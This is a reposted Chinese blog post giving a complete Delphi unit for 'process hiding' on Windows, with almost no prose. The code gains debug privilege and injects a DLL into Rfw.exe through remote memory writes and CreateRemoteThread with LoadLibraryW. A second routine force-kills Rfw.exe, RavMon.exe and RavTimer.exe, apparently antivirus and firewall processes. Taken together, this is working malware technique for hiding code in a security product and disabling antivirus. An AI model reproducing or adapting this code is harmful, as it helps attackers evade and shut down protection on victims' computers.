delphi 如何在在Windows平台下实现进程隐藏

本文整理自网络，侵删。

 unit Unit1;

interface

uses
   Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
   StdCtrls, tlhelp32;
{type
   TProcessEntry32 = record
     dwSize: DWORD;
     cntUsage: DWORD;
     th32ProcessID: DWORD;
     th32DefaultHeapID: DWORD;
     th32ModuleID: DWORD;
     cntThreads: DWORD;
     th32ParentProcessID: DWORD;
     pcPriClassBase: integer;
     dwFlags: DWORD;
     szExeFile: array[0..MAX_PATH - 1] of char;
   end; }
type
   TForm1 = class(TForm)
     Button1: TButton;
     Button2: TButton;
     procedure Button1Click(Sender: TObject);
     procedure Button2Click(Sender: TObject);
   private
     function TerminateAProcess(var HostFile: string):Boolean;
     { Private declarations }
   public
     { Public declarations }
   end;

var
   Form1: TForm1;

implementation

{$R *.DFM}

procedure FindAProcess(const AFilename: string; const PathMatch: Boolean; var ProcessID: DWORD);
var
   lppe: TProcessEntry32;
   SsHandle: Thandle;
   FoundAProc, FoundOK: boolean;
begin
   ProcessID :=0;
   SsHandle := CreateToolHelp32SnapShot(TH32CS_SnapProcess, 0);
   FoundAProc := Process32First(Sshandle, lppe);
   while FoundAProc do
   begin
     if PathMatch then
       FoundOK := AnsiStricomp(lppe.szExefile, PChar(AFilename)) = 0
     else
       FoundOK := AnsiStricomp(PChar(ExtractFilename(lppe.szExefile)), PChar(ExtractFilename(AFilename))) = 0;
     if FoundOK then
     begin
       ProcessID := lppe.th32ProcessID;
       break;
     end;
     FoundAProc := Process32Next(SsHandle, lppe);
   end;
   CloseHandle(SsHandle);
end;

function EnabledDebugPrivilege(const bEnabled: Boolean): Boolean;
var
   hToken: THandle;
   tp: TOKEN_PRIVILEGES;
   a: DWORD;
const
   SE_DEBUG_NAME = 'SeDebugPrivilege';
begin
   Result := False;
   if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)) then
   begin
     tp.PrivilegeCount := 1;
     LookupPrivilegeValue(nil, SE_DEBUG_NAME, tp.Privileges[0].Luid);
     if bEnabled then
       tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
     else
       tp.Privileges[0].Attributes := 0;
     a := 0;
     AdjustTokenPrivileges(hToken, False, tp, SizeOf(tp), nil, a);
     Result := GetLastError = ERROR_SUCCESS;
     CloseHandle(hToken);
   end;
end;

function AttachToProcess(const HostFile, GuestFile: string; const PID: DWORD = 0): DWORD;
var
   hRemoteProcess: THandle;
   dwRemoteProcessId: DWORD;
   cb: DWORD;
   pszLibFileRemote: Pointer;
   iReturnCode: Boolean;
   TempVar: DWORD;
   pfnStartAddr: TFNThreadStartRoutine;
   pszLibAFilename: PwideChar;
begin
   Result := 0;
   EnabledDebugPrivilege(True);
   Getmem(pszLibAFilename, Length(GuestFile) * 2 + 1);
   StringToWideChar(GuestFile, pszLibAFilename, Length(GuestFile) * 2 + 1);
   if PID > 0 then
      dwRemoteProcessID := PID
   else
      FindAProcess(HostFile, False, dwRemoteProcessID);
   hRemoteProcess := OpenProcess(PROCESS_Create_THREAD + {允许远程创建线程}
       PROCESS_VM_OPERATION + {允许远程VM操作}
       PROCESS_VM_WRITE, {允许远程VM写}
       FALSE, dwRemoteProcessId);
   cb := (1 + lstrlenW(pszLibAFilename)) * sizeof(WCHAR);
   pszLibFileRemote := PWIDESTRING(VirtualAllocEx(hRemoteProcess, nil, cb, MEM_COMMIT, PAGE_READWRITE));
   TempVar := 0;
   iReturnCode := WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibAFilename, cb, TempVar);
   if iReturnCode then
   begin
     pfnStartAddr := GetProcAddress(GetModuleHandle('Kernel32'), 'LoadLibraryW');
     TempVar := 0;
     Result := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, TempVar);
   end;
   Freemem(pszLibAFilename);
end;

procedure TForm1.Button1Click(Sender: TObject);
begin
   AttachToProcess('Rfw.exe', extractfilepath(paramstr(0))+'Project2.dll');
end;

function TForm1.TerminateAProcess(var HostFile: string): Boolean;
var
   HProcessedID:DWORD;
   HProcedss:THandle;
begin
   Result:=True;
   EnabledDebugPrivilege(True);
   FindAProcess(HostFile,False,HProcessedID);
   if HProcessedID<>0 then
   begin
     HProcedss:=OpenProcess(PROCESS_TERMINATE,True,HProcessedID);
     if not TerminateProcess(HProcedss,0) then
        ShowMessage(IntToStr( GetLastError));
   end;
   EnabledDebugPrivilege(False);
end;

procedure TForm1.Button2Click(Sender: TObject);
var
   FileName:array[0..25] of String;
begin
   FileName[0]:='Rfw.exe';
   FileName[1]:='RavMon.exe';
   FileName[2]:='RavTimer.exe';
   TerminateAProcess(FileName[1]);
   TerminateAProcess(FileName[0]);
   TerminateAProcess(FileName[2]);
end;

end. 

相关阅读 >>

Delphi datasnap 2009的简单使用

Delphi 枚举消息钩子的代码

Delphi删除cookie和ie缓存

Delphi 文件查找记录类型 - tsearchrec

Delphi rewrite 以可写方式打开文件

Delphi的串口通讯，数据接收实时性太差

Delphi 几种程序自杀的方法

Delphi ado组件动态连接access数据库

Delphi 获取随机字符串的方法 thash.getrandomstring

Delphi 如何刷新文件图标

更多相关阅读请进入《Delphi》频道 >>

转载请注明出处：木庄网络博客 » delphi 如何在在Windows平台下实现进程隐藏